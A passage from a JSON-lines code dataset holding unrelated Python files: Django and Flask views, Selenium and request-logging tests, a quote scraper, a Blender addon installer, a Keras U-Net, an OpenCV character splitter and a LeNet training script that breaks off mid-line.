cwt.ParameterError('Variable must provide a uri.')\n\n name = None\n var_name = None\n\n if 'id' in data:\n if '|' in data['id']:\n var_name, name = data['id'].split('|')\n else:\n raise cwt.ParameterError('Variable id must contain a variable name and id.')\n else:\n raise cwt.ParameterError('Variable must provide an id.')\n\n domains = None\n\n if 'domain' in data:\n domains = data['domain']\n\n if not isinstance(domains, (list, tuple)):\n domains = [domains]\n\n mime_type = None\n\n if 'mime_type' in data:\n mime_type = data['mime_type']\n\n return cls(uri, var_name, domains=domains, name=name, mime_type=mime_type)\n\n def resolve_domains(self, domains):\n \"\"\" Resolves the domain identifiers to objects. 
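Raises an Exception if a\n        referenced domain name is missing from the given mapping. 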
\"\"\"\n\n if self.domains is None:\n return\n \n new_domains = []\n\n for d in self.domains:\n if d not in domains:\n raise Exception('Could not find domain {}'.format(d))\n\n new_domains.append(domains[d])\n\n self.domains = new_domains\n\n def localize(self, filename=None):\n if filename is None:\n filename = 'output.nc'\n\n try:\n response = requests.get(self.uri)\n except requests.ConnectionError:\n raise Exception('Failed to localize file.')\n\n path = os.path.join(os.getcwd(), filename)\n\n with open(path, 'w') as f:\n for chunk in response.iter_content(512000):\n f.write(chunk)\n\n return path\n\n def parameterize(self):\n \"\"\" Parameterize variable for GET request. \"\"\"\n params = {\n 'uri': self.uri,\n 'id': self.var_name,\n }\n\n if self.domains:\n params['domain'] = '|'.join(dom.name for dom in self.domains)\n\n if self.var_name:\n params['id'] += '|' + str(self.name)\n\n if self.mime_type:\n params['mime_type'] = self.mime_type\n\n return params\n\n def __repr__(self):\n return ('Variable(name=%r, uri=%r, var_name=%r, domains=%r, '\n 'mime_type=%r)' % (self.name, self.uri, self.var_name,\n self.domains, self.mime_type))\n","sub_path":"cwt/variable.py","file_name":"variable.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"430919371","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import RegistrationForm, UserUpdate,ProfileUpdate\nfrom django.contrib.auth.decorators import login_required\n\ndef register(request):\n\n if request.method == 'POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request,f'congratulations {username}. your account has been created!you are now able to login')\n return redirect('login')\n else:\n\n form = RegistrationForm()\n\n return render(request,'register.html',{'form':form})\n\n@login_required\ndef profile(request):\n\n return render(request,'profile.html')\n\n\n\ndef profile_update(request):\n if request.method == 'POST':\n u_form = UserUpdate(request.POST,instance=request.user)\n p_form = ProfileUpdate(request.POST,request.FILES,instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n messages.success(request,f'your account has been updated successfully!')\n return redirect('profile')\n\n else:\n u_form = UserUpdate(instance=request.user)\n p_form = ProfileUpdate(instance=request.user.profile)\n context = {\n 'u_form':u_form,\n 'p_form':p_form\n }\n\n return render(request,'profile_update.html',context)\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"271541669","text":"#! 
/usr/bin/python3 \n# coding:utf-8\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom django.test import LiveServerTestCase\n\nclass NewVisitorTest(LiveServerTestCase):\n\n    def setUp(self):\n        self.browser = webdriver.Chrome()\n        self.browser.implicitly_wait(3)\n    \n    def tearDown(self):\n        self.browser.quit()\n    \n    def check_row_in_table(self,row_text):\n        table = self.browser.find_element_by_id('id_list_table')\n        rows = table.find_elements_by_tag_name('tr')\n        self.assertIn(row_text,[row.text for row in rows])\n    \n    def test_cat_start_list_and_retrieve_it_later(self):\n        self.browser.get(self.live_server_url)\n        self.assertIn('To-Do',self.browser.title)\n\n        header_text = self.browser.find_element_by_tag_name('h1').text\n        self.assertIn('To-Do',header_text)\n\n        inputbox = self.browser.find_element_by_id('id_new_item')\n        self.assertEqual(\n            inputbox.get_attribute('placeholder'),\n            'Enter a new item'\n        )\n\n        inputbox.send_keys('Buy a fish food')\n        inputbox.send_keys(Keys.ENTER)\n        \n        edith_list_url = self.browser.current_url\n\n        self.assertRegex(edith_list_url,'/lists/.+')\n        self.check_row_in_table('1: Buy a fish food')\n\n\n        inputbox = self.browser.find_element_by_id('id_new_item')\n        inputbox.send_keys('Use fish food to fly')\n        inputbox.send_keys(Keys.ENTER)\n\n        self.check_row_in_table('1: Buy a fish food')\n        self.check_row_in_table('2: Use fish food to fly')\n\n        self.browser.quit()\n        self.browser = webdriver.Chrome()\n        \n        self.browser.get(self.live_server_url)\n        page_text = self.browser.find_element_by_tag_name('body').text\n        \n        self.assertNotIn('Buy a fish food',page_text)\n        self.assertNotIn('Use fish food to fly',page_text)\n\n        inputbox = self.browser.find_element_by_id('id_new_item')\n        inputbox.send_keys('Buy milk')\n        inputbox.send_keys(Keys.ENTER)\n\n        francis_list_url = self.browser.current_url\n        self.assertRegex(francis_list_url,'/lists/.+')\n        self.assertNotEqual(edith_list_url,francis_list_url)\n\n        page_text = self.browser.find_element_by_tag_name('body').text\n        self.assertNotIn('Buy a fish food',page_text)\n        self.assertIn('Buy milk',page_text)\n\n\n        self.fail('Finish functional!')\n    \n\n","sub_path":"functional/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"412652900","text":"\n# ======================================================\n# @Author : Daniel                 \n# @Time : 2020.6.20\n# @Desc : User views\n# ======================================================\n\nfrom flask import request, render_template, redirect, url_for\nfrom utils.check_login import is_login\nfrom .models import Grade, Student\nfrom .user_views import user_bp\n\n\n@user_bp.route('/grade/', methods=['GET'])\n@is_login\ndef grade_list():\n    \"\"\"\n    Show the class list\n    :return:\n    \"\"\"\n    if request.method == 'GET':\n        # which page of data to query\n        page = int(request.args.get('page', 1))\n        # how many records per page; default is 10\n        page_num = int(request.args.get('page_num', 10))\n        # query the requested number of records for the current page\n        paginate = Grade.query.order_by('g_id').paginate(page, page_num)\n        # get the concrete records for that page\n        grades = paginate.items\n\n        # return the fetched data to the frontend page\n        return render_template('grade/grade_list.html', grades=grades, paginate=paginate)\n\n\n@user_bp.route('/grade_edit/', methods=['GET', 'POST'])\n@is_login\ndef edit_grade():\n    \"\"\"\n    Add or edit a class\n    :return:\n    \"\"\"\n    if request.method == 'GET':\n        g_id = request.args.get('g_id', None)\n\n        if g_id:\n            grade = Grade.query.get(int(g_id))\n            # g_name = 
Grade.query.filter(Grade.g_id==g_id).first().g_name\n        else:\n            grade = None\n\n        return render_template('grade/grade_edit.html', grade=grade)\n\n    if request.method == 'POST':\n        g_name = request.form['g_name']\n\n        # determine whether this is an edit of an existing class\n        if 'g_id' in request.form and request.form['g_id']:\n            grade = Grade.query.get(int(request.form['g_id']))\n            grade.g_name = g_name\n\n        else:\n\n            o_grade = Grade.query.filter_by(g_name=g_name).first()\n\n            # check whether the class to add already exists in the database (class names must be unique)\n            if o_grade:\n                msg = 'Class names must be unique!!'\n                return render_template('grade/grade_edit.html', msg=msg)\n\n            # create the class\n            grade = Grade(g_name)\n\n        grade.save()\n\n        return redirect(url_for('user.grade_list'))\n\n\n@user_bp.route('/grade_student/', methods=['GET', 'POST'])\n@is_login\ndef grade_students_list():\n    \"\"\"\n    List the students of a class\n    :return:\n    \"\"\"\n    if request.method == 'GET':\n        g_id = request.args.get('g_id')\n\n        # which page\n        page = int(request.args.get('page', 1))\n        # records per page\n        page_num = int(request.args.get('page_num', 10))\n        # query the requested number of records for the current page\n        paginate = Student.query.filter_by(grade_id=g_id).order_by('s_id').paginate(page, page_num)\n\n        # get the concrete records for that page\n        students = paginate.items\n\n        return render_template('student/student_list.html', students=students, paginate=paginate)\n\n","sub_path":"App/grade_views.py","file_name":"grade_views.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"275160150","text":"# BrainyQuote Web Scraper (By Keyword)\n# SPECIAL POMMUNISM EDITION\n# Alaina Kafkes\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom os.path import exists\nimport re\n\n# # For every page pertaining to a topic\n# for page in pageNameArray:\n#     # Obtain BrainyQuote page html\n#     base_url = \"http://www.brainyquote.com/quotes/keywords/\"\n#     url = base_url + keyword + \".html\"\n#     response_data = requests.get(url).text[:]\n#     soup = BeautifulSoup(response_data, 'html.parser')\n\n#     # Populate quoteArray\n#     for item in soup.find_all(\"span\", class_=\"bqQuoteLink\"):\n#         quoteArray.append(item.get_text().rstrip())\n\n#     # Populate authorArray\n#     for item in soup.find_all(\"div\", class_=\"bq-aut\"):\n#         authorArray.append(item.get_text())\n\ndef main():\n    url = 'https://www.brainyquote.com/quote_of_the_day'\n    response_data = requests.get(url).text[:]\n    if not exists('/home/jim/tmp/qod.html'):\n        file = open('/home/jim/tmp/qod.html', 'w')\n        file.write(response_data)\n    soup = BeautifulSoup(response_data, 'html.parser')\n    display = re.compile('^display:')\n    view_author = re.compile('view author')\n    # <div class=\"grid-item qb clearfix bqQt\">\n    for item in soup.find_all(\"div\", class_=\"grid-item qb clearfix bqQt\"):\n        # print(item)\n        # <h2 class=\"qotd-h2\">Funny Quote Of the Day</h2>\n        category = item.find(\"h2\",class_=\"qotd-h2\")\n        if category:\n            print('category: %s' % category.get_text().strip())\n        # <div style=\"display: flex;justify-content: space-between\">\n        quote = item.find(\"div\", { \"style\" : display })\n        if quote:\n            print('quote: %s' % quote.get_text().strip())\n        # <a href=\"/authors/jonathan-swift-quotes\" class=\"bq-aut qa_155269 oncl_a\" title=\"view author\">Jonathan Swift</a>\n        author = item.find(\"a\", {\"title\" : \"view author\"})\n        if author:\n            print('author: %s' % author.get_text().strip())\n\n    # # Populate authorArray\n    # for item in soup.find_all(\"div\", class_=\"bq-aut\"):\n    #     authorArray.append(item.get_text())\nif __name__ == '__main__':\n    
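# scrape today's Quote of the Day page and print each quote's category, text, and author\n    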
main()","sub_path":"brainscrapeqod.py","file_name":"brainscrapeqod.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"208842516","text":"# Install the addon and save the user's preferences\nimport bpy\nimport os\n\n# Get the absolute path to the addon\ndir = os.path.dirname(__file__)\naddonFilePath = dir + '/blender-mesh-to-json.py'\n\n# Install the addon, enable it and save the user's preferences so that it\n# is available whenever Blender is opened in the future\nbpy.ops.preferences.addon_install(filepath=addonFilePath)\nbpy.ops.preferences.addon_enable(module='blender-mesh-to-json')\nbpy.ops.wm.save_userpref()\n","sub_path":"install-addon.py","file_name":"install-addon.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"364674480","text":"a=int(input('Introduceti primul numar = '))\r\nb=int(input('Introduceti al doilea numar = '))\r\nif ((a%2)==0) and ((b%2)==0):\r\n if (a>b):\r\n print (a)\r\n if (a<b):\r\n print (b)\r\nif ((a%2)==0) and ((b%2)!=0):\r\n print (a)\r\nif ((b%2)==0) and ((a%2)!=0):\r\n print (b)\r\nif ((a%2)!=0) and ((b%2)!=0):\r\n print ('numere nu sunt pare')\r\n\r\n","sub_path":"Problema8.py","file_name":"Problema8.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"101650430","text":"class RGBA(object):\r\n \"\"\"Container to hoal a RGBA color\"\"\"\r\n def __init__(self, R=0, G=0, B=0, A=0):\r\n super(RGBA, self).__init__()\r\n self.R = R\r\n self.G = G\r\n self.B = B\r\n self.A = A\r\n\r\n\r\n def __eq__(self, other):\r\n return self.R == other.R \\\r\n and self.G == other.G \\\r\n and self.B == other.B \\\r\n and self.A == other.A\r\n\r\n\r\n def __repr__(self):\r\n return \"RGBA({},{},{},{})\".format(\r\n str(self.R).rjust(3),\r\n str(self.G).rjust(3),\r\n str(self.B).rjust(3),\r\n str(self.A).rjust(3))\r\n\r\n\r\ncolors = {\r\n \"red\": RGBA(255, 0, 0, 255),\r\n \"green\": RGBA(0, 255, 0, 255),\r\n \"blue\": RGBA(0, 0, 255, 255),\r\n \"black\": RGBA(0, 0, 0, 255),\r\n \"white\": RGBA(255, 255, 255, 255),\r\n \"default\": RGBA(0, 0, 0, 0),\r\n}\r\n\r\n\r\nclass Board(object):\r\n \"\"\"Represents a board that we can draw on and request data\"\"\"\r\n def __init__(self, width, height):\r\n super(Board, self).__init__()\r\n self.width = width\r\n self.height = height\r\n self.board = [[RGBA() for _ in range(width)] for _ in range(height)]\r\n\r\n\r\n def pixelAt(self, x, y):\r\n if x >= self.width:\r\n return None\r\n if y >= self.height:\r\n return None\r\n return self.board[x][y]\r\n\r\n\r\n def set(self, x, y, color):\r\n if x >= self.width:\r\n return\r\n if y >= self.height:\r\n return\r\n self.board[x][y] = color\r\n\r\n\r\n def reset(self):\r\n for x in range(self.width):\r\n for y in range(self.height):\r\n self.board[x][y] = colors[\"default\"]\r\n\r\n\r\n def paint(self, color):\r\n for x in range(self.width):\r\n for y in range(self.height):\r\n self.board[x][y] = color\r\n\r\n\r\n def __repr__(self):\r\n s = \"Board({}x{}):\\n{}\".format(self.width, self.height,\r\n \"\\n\".join(\r\n \", \".join(\r\n str(color) for color in line)\r\n for line in self.board\r\n ))\r\n return s\r\n\r\n\r\nif __name__ == '__main__':\r\n import jsonpickle\r\n\r\n # create a board\r\n board = Board(3, 3)\r\n\r\n # pickle and depickle\r\n json = jsonpickle.encode(board)\r\n copy = 
jsonpickle.decode(json)\r\n assert copy.width == board.width\r\n assert copy.board[0][0] == board.board[0][0]\r\n\r\n # Set some pixels, also outside\r\n board.set(0, 0, colors[\"green\"])\r\n board.set(2, 2, colors[\"green\"])\r\n board.set(6, 6, colors[\"green\"])\r\n print(board)\r\n\r\n # Reset the board\r\n board.reset()\r\n print(board)\r\n\r\n","sub_path":"board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"32193247","text":"from keras.models import Model\nfrom keras.layers import Input, Conv2D, Dropout, MaxPooling2D, UpSampling2D, concatenate\n\n\ndef U_net(pretrained_weights=None, input_size=(256, 256, 1), n_output_channels=1,\n channels_start=4, dropout=0.0, head_dropout=0.3, depth=5, pool_size=2,\n final_activation='sigmoid'):\n \"\"\"\n model = U_net(\n input_size=(None, None, 3), n_output_channels=1,\n channels_start=8, dropout=0.0, head_dropout=0.4,\n depth=5, pool_size=2, final_activation='sigmoid'\\\n )\n \"\"\"\n assert channels_start > n_output_channels * 2\n assert final_activation in ['sigmoid', 'softmax']\n inputs = Input(input_size)\n\n in_depth_layers = []\n x = inputs\n\n for i in range(depth):\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = drop = Dropout(dropout)(x)\n x = MaxPooling2D(pool_size=(pool_size, pool_size))(x)\n\n in_depth_layers.append(drop)\n\n x = Conv2D(2 ** depth * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Conv2D(2 ** depth * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Dropout(dropout)(x)\n\n for i in reversed(range(depth)):\n x = Conv2D(2 ** i * channels_start, 2, activation='relu', padding='same', kernel_initializer='he_normal')(\n UpSampling2D(size=(pool_size, pool_size))(x))\n x = concatenate([in_depth_layers[i], x], axis=3)\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Conv2D(2 ** i * channels_start, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n\n x = Conv2D(n_output_channels * 2, 3, activation='relu', padding='same', kernel_initializer='he_normal')(x)\n x = Dropout(head_dropout)(x)\n x = Conv2D(n_output_channels * 2, 1, activation='relu')(x)\n x = Dropout(head_dropout)(x)\n x = Conv2D(n_output_channels, 1, activation=final_activation)(x)\n\n model = Model(input=inputs, output=x)\n\n if pretrained_weights is not None:\n model.load_weights(pretrained_weights)\n\n return model\n","sub_path":"enjoyml/keras/applications.py","file_name":"applications.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"53658440","text":"#! 
/usr/bin/env python\nimport io\nimport unittest\n\nimport logging\nimport mock\nfrom django.conf import settings\nfrom django.test import RequestFactory, override_settings\n\nimport request_logging\nfrom request_logging.middleware import LoggingMiddleware, DEFAULT_LOG_LEVEL, DEFAULT_COLORIZE, DEFAULT_MAX_BODY_LENGTH\n\nsettings.configure()\n\n\nclass BaseLogTestCase(unittest.TestCase):\n def _assert_logged(self, mock_log, expected_entry):\n calls = mock_log.log.call_args_list\n text = \"\".join([call[0][1] for call in calls])\n self.assertIn( expected_entry, text )\n\n def _assert_logged_with_level(self, mock_log, level):\n calls = mock_log.log.call_args_list\n called_levels = set(call[0][0] for call in calls)\n self.assertIn(level, called_levels, \"{} not in {}\".format(level, called_levels))\n\n def _assert_not_logged(self, mock_log, unexpected_entry):\n calls = mock_log.log.call_args_list\n text = \" \".join([call[0][1] for call in calls])\n self.assertNotIn(unexpected_entry, text)\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogTestCase(BaseLogTestCase):\n def setUp(self):\n self.factory = RequestFactory()\n self.middleware = LoggingMiddleware()\n\n def test_request_body_logged(self, mock_log):\n body = u\"some body\"\n request = self.factory.post(\"/somewhere\", data={\"file\": body})\n self.middleware.process_request(request)\n self._assert_logged(mock_log, body)\n\n def test_request_binary_logged(self, mock_log):\n body = u\"some body\"\n datafile = io.StringIO(body)\n request = self.factory.post(\"/somewhere\", data={\"file\": datafile})\n self.middleware.process_request(request)\n self._assert_logged(mock_log, \"(binary data)\")\n\n def test_request_headers_logged(self, mock_log):\n request = self.factory.post(\"/somewhere\",\n **{'HTTP_USER_AGENT': 'silly-human'})\n self.middleware.process_request(request)\n self._assert_logged(mock_log, \"HTTP_USER_AGENT\")\n\n def test_response_headers_logged(self, mock_log):\n request = self.factory.post(\"/somewhere\")\n response = mock.MagicMock()\n response.get.return_value = 'application/json'\n response._headers = {'test_headers': 'test_headers'}\n self.middleware.process_response(request, response)\n self._assert_logged(mock_log, \"test_headers\")\n\n\nclass BaseLogSettingsTestCase(BaseLogTestCase):\n def setUp(self):\n body = u\"some body\"\n datafile = io.StringIO(body)\n self.request = RequestFactory().post(\n \"/somewhere\",\n data={'file': datafile},\n **{'HTTP_USER_AGENT': 'silly-human'}\n )\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogSettingsLogLevelTestCase(BaseLogSettingsTestCase):\n def test_logging_default_debug_level(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n self._assert_logged_with_level(mock_log, DEFAULT_LOG_LEVEL)\n\n @override_settings(REQUEST_LOGGING_DATA_LOG_LEVEL=logging.INFO)\n def test_logging_with_customized_log_level(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n self._assert_logged_with_level(mock_log, logging.INFO)\n\n @override_settings(REQUEST_LOGGING_DATA_LOG_LEVEL=None)\n def test_invalid_log_level(self, mock_log):\n with self.assertRaises(ValueError):\n LoggingMiddleware()\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogSettingsColorizeTestCase(BaseLogSettingsTestCase):\n def test_default_colorize(self, mock_log):\n middleware = LoggingMiddleware()\n middleware.process_request(self.request)\n 
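# with no REQUEST_LOGGING_DISABLE_COLORIZE override, colorization should match the library default\n        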
self.assertEqual(DEFAULT_COLORIZE, self._is_log_colorized(mock_log))\n\n    @override_settings(REQUEST_LOGGING_DISABLE_COLORIZE=False)\n    def test_disable_colorize(self, mock_log):\n        middleware = LoggingMiddleware()\n        middleware.process_request(self.request)\n        self.assertFalse(self._is_log_colorized(mock_log))\n\n    @override_settings(REQUEST_LOGGING_DISABLE_COLORIZE='Not a boolean')\n    def test_invalid_colorize(self, mock_log):\n        with self.assertRaises(ValueError):\n            LoggingMiddleware()\n\n    def _is_log_colorized(self, mock_log):\n        reset_code = '\\x1b[0m'\n        calls = mock_log.log.call_args_list\n        logs = \" \".join(call[0][1] for call in calls)\n        return reset_code in logs\n\n\n@mock.patch.object(request_logging.middleware, \"request_logger\")\nclass LogSettingsMaxLengthTestCase(BaseLogTestCase):\n    @override_settings(REQUEST_LOGGING_DISABLE_COLORIZE=False)\n    def test_default_max_body_length(self, mock_log):\n        factory = RequestFactory()\n        middleware = LoggingMiddleware()\n\n        body = DEFAULT_MAX_BODY_LENGTH * \"0\" + \"1\"\n        request = factory.post(\"/somewhere\", data={\"file\": body})\n        middleware.process_request(request)\n        self._assert_logged(mock_log, str(request.body[:DEFAULT_MAX_BODY_LENGTH]))\n        self._assert_not_logged(mock_log, body)\n\n    @override_settings(REQUEST_LOGGING_MAX_BODY_LENGTH=150, REQUEST_LOGGING_DISABLE_COLORIZE=False)\n    def test_customized_max_body_length(self, mock_log):\n        factory = RequestFactory()\n        middleware = LoggingMiddleware()\n\n        body = 150 * \"0\" + \"1\"\n        request = factory.post(\"/somewhere\", data={\"file\": body})\n        middleware.process_request(request)\n        self._assert_logged(mock_log, str(request.body[:150]))\n        self._assert_not_logged(mock_log, body)\n\n    @override_settings(REQUEST_LOGGING_MAX_BODY_LENGTH='Not an int')\n    def test_invalid_max_body_length(self, mock_log):\n        with self.assertRaises(ValueError):\n            LoggingMiddleware()\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"347799950","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n# helper function for sorting sub images by X value\ndef sort_list(list1, list2):\n    zipped_pairs = zip(list2, list1)\n    z = [x for _, x in sorted(zipped_pairs)]\n\n    return z\n\n\n\"\"\"\ninput: encoded image bytes\noutput: a unique image for each character detected in an image\n\"\"\"\ndef get_split_images(image):\n    im = cv2.imdecode(np.frombuffer(image,dtype=np.uint8),cv2.IMREAD_COLOR)\n\n    imgray = cv2.cvtColor(im,cv2.COLOR_BGR2GRAY) # convert to greyscale\n\n    # detect contours\n    ret,thresh = cv2.threshold(imgray,127,255,0)\n    im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n    output_contours = []\n    output_hierarchy = []\n    output_xs = []\n\n    # for each contour found\n    for i, contour in enumerate(contours):\n\n        # get rectangle bounding contour\n        [x,y,w,h] = cv2.boundingRect(contour)\n\n        # discard areas that are too large\n        if h > 300 and w > 300:\n            continue\n\n        # discard areas that are too small\n        if h < 40 or w < 40:\n            continue\n\n        roi = im[y:y + h, x:x + w]\n\n        # store the character's image, its hierarchy, and its X value\n        output_contours.append(roi)\n        
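# hierarchy[0, i, 3] is the index of this contour's parent (-1 for a top-level contour)\n        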
output_hierarchy.append(hierarchy[0,i,3])\n output_xs.append(x)\n\n\n # sort contours by X values\n output_contours = sort_list(output_contours, output_xs)\n output_hierarchy = sort_list(output_hierarchy, output_xs)\n\n # find the top level contour\n min_hierarchy = min(output_hierarchy)\n\n result = []\n # output contours that are on the top level\n print(len(output_contours))\n for i in range(len(output_contours)):\n b, g, r = cv2.split(output_contours[i])\n a = np.ones(b.shape, dtype=b.dtype) * 50\n\n final_img = cv2.merge((b, g, r))\n\n final_img = cv2.normalize(final_img, None, alpha = 0, beta = 1, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n\n final_img = cv2.resize(final_img,(50,50))\n\n final_img = cv2.cvtColor(final_img,cv2.COLOR_BGR2GRAY)\n\n result.append(final_img)\n #result.append(np.expand_dims(np.expand_dims(final_img,axis=-1),axis=0))\n\n return result\n","sub_path":"Lab6/server/split_up_text.py","file_name":"split_up_text.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"600549576","text":"import pickle\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.contrib.layers import flatten\n\n\ndef safe_indexing(X, indices):\n \"\"\"Return items or rows from X using indices.\n Allows simple indexing of lists or arrays.\n Parameters\n ----------\n X : array-like, sparse-matrix, list.\n Data from which to sample rows or items.\n indices : array-like, list\n Indices according to which X will be subsampled.\n \"\"\"\n if hasattr(X, \"iloc\"):\n # Pandas Dataframes and Series\n return X.iloc[indices]\n elif hasattr(X, \"shape\"):\n if hasattr(X, 'take') and (hasattr(indices, 'dtype') and\n indices.dtype.kind == 'i'):\n # This is often substantially faster than X[indices]\n return X.take(indices, axis=0)\n else:\n return X[indices]\n else:\n return [X[idx] for idx in indices]\n\n\ndef shuffle(*arrays):\n random_state = np.random.mtrand._rand\n replace = False\n max_n_samples = None\n\n if len(arrays) == 0:\n return None\n\n first = arrays[0]\n n_samples = first.shape[0] if hasattr(first, 'shape') else len(first)\n\n if max_n_samples is None:\n max_n_samples = n_samples\n elif (max_n_samples > n_samples) and (not replace):\n raise ValueError(\"Cannot sample %d out of arrays with dim %d\"\n \"when replace is False\" % (max_n_samples,\n n_samples))\n\n if replace:\n indices = random_state.randint(0, n_samples, size=(max_n_samples,))\n else:\n indices = np.arange(n_samples)\n random_state.shuffle(indices)\n indices = indices[:max_n_samples]\n\n # convert sparse matrices to CSR for row-based indexing\n # arrays = [a.tocsr() for a in arrays]\n resampled_arrays = [safe_indexing(a, indices) for a in arrays]\n if len(resampled_arrays) == 1:\n # syntactic sugar for the unit argument case\n return resampled_arrays[0]\n else:\n return resampled_arrays\n\n\ndef LeNet(x, dropout_prob):\n # Arguments used for tf.truncated_normal, randomly defines variables for the weights and biases for each layer\n mu = 0\n sigma = 0.1\n\n conv0_W = tf.Variable(tf.truncated_normal(shape=(1, 1, 1, 1), mean=mu, stddev=sigma))\n conv0_b = tf.Variable(tf.zeros(1))\n conv0 = tf.nn.conv2d(x, conv0_W, strides=[1, 1, 1, 1], padding='SAME') + conv0_b\n conv0 = tf.nn.relu(conv0)\n\n # SOLUTION: Layer 1: Convolutional. Input = 32x32x1. 
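(5x5 kernel, VALID padding: 32 - 5 + 1 = 28.) 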
Output = 28x28x6.\n conv1_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 1, 6), mean=mu, stddev=sigma))\n conv1_b = tf.Variable(tf.zeros(6))\n conv1 = tf.nn.conv2d(conv0, conv1_W, strides=[1, 1, 1, 1], padding='VALID') + conv1_b\n\n # SOLUTION: Activation.\n conv1 = tf.nn.relu(conv1)\n\n # SOLUTION: Pooling. Input = 28x28x6. Output = 14x14x6.\n conv1 = tf.nn.max_pool(conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # SOLUTION: Layer 2: Convolutional. Output = 10x10x16.\n conv2_W = tf.Variable(tf.truncated_normal(shape=(5, 5, 6, 16), mean=mu, stddev=sigma))\n conv2_b = tf.Variable(tf.zeros(16))\n conv2 = tf.nn.conv2d(conv1, conv2_W, strides=[1, 1, 1, 1], padding='VALID') + conv2_b\n\n # SOLUTION: Activation.\n conv2 = tf.nn.relu(conv2)\n\n # SOLUTION: Pooling. Input = 10x10x16. Output = 5x5x16.\n conv2 = tf.nn.max_pool(conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='VALID')\n\n # SOLUTION: Flatten. Input = 5x5x16. Output = 400.\n fc0 = flatten(conv2)\n\n # SOLUTION: Layer 3: Fully Connected. Input = 400. Output = 120.\n fc1_W = tf.Variable(tf.truncated_normal(shape=(400, 120), mean=mu, stddev=sigma))\n fc1_b = tf.Variable(tf.zeros(120))\n fc1 = tf.matmul(fc0, fc1_W) + fc1_b\n\n # SOLUTION: Activation.\n fc1 = tf.nn.relu(fc1)\n fc1 = tf.nn.dropout(fc1, dropout_prob)\n\n # SOLUTION: Layer 4: Fully Connected. Input = 120. Output = 84.\n fc2_W = tf.Variable(tf.truncated_normal(shape=(120, 84), mean=mu, stddev=sigma))\n fc2_b = tf.Variable(tf.zeros(84))\n fc2 = tf.matmul(fc1, fc2_W) + fc2_b\n\n # SOLUTION: Activation.\n fc2 = tf.nn.relu(fc2)\n fc2 = tf.nn.dropout(fc2, dropout_prob)\n\n # SOLUTION: Layer 5: Fully Connected. Input = 84. Output = 10.\n fc3_W = tf.Variable(tf.truncated_normal(shape=(84, n_classes), mean=mu, stddev=sigma))\n fc3_b = tf.Variable(tf.zeros(n_classes))\n logits = tf.matmul(fc2, fc3_W) + fc3_b\n\n return logits\n\n\ntraining_file = 'train.p'\nvalidation_file = 'valid.p'\ntesting_file = 'test.p'\n\nwith open(training_file, mode='rb') as f:\n train = pickle.load(f)\nwith open(validation_file, mode='rb') as f:\n valid = pickle.load(f)\nwith open(testing_file, mode='rb') as f:\n test = pickle.load(f)\n\nn_train = len(train[\"features\"])\nn_test = len(test[\"features\"])\nn_valid = len(valid[\"features\"])\nn_classes = len(set(test[\"labels\"]))\n\nprint(n_train)\nprint(n_valid)\nprint(n_test)\nprint(n_classes)\n\nwidth, height = len(test[\"features\"][0]), len(test[\"features\"][0][0])\nimage_shape = (width, height)\n\nEPOCHS = 20\nBATCH_SIZE = 256\nLEARNING_RATE = 0.001\nDROPOUT = 0.60\n\nfeatures_placeholder = tf.placeholder(tf.float32, (None, height, width, None), name='features_placeholder')\nfeatures = 